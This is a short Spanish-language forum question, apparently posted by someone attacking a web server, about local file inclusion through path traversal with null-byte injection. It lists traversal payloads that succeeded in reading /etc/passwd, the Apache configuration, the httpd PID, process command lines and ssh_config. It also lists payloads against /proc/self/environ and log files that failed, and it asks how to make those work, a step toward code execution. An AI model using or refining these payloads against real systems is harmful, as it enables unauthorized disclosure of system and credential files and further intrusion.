¿Qué en una máquina impediría que una inyección de byte nulo muestre la salida de /proc/self/environ y /proc/$PID/environ o /proc/$PID/fd/12 ?
De acuerdo con este artículo, todas las carpetas bajo /proc deben tener los permisos para el usuario que ejecuta el servicio ... por lo tanto, la inyección utilizando un byte nulo ocurre bajo el usuario www-data ¿correcto?
Resultados visibles en:
../../../../../../etc/passwd%00 {output passwd file}
../../../../../../etc/httpd/conf/httpd.conf%00 {output apache config}
../../../../../../etc/httpd/run/httpd.pid%00 {PID of httpd process}
../../../../../../proc/$PID/cmdline%00 {cmd line executed to run httpd}
../../../../../../etc/ssh/ssh_config%00 {ssh config file}
No obteniendo resultados de:
../../../../../../var/log/messages%00
../../../../../../var/log/secure%00
../../../../../../proc/self/environ%00
../../../../../../proc/$PID/environ%00
Cualquier consejo sería genial.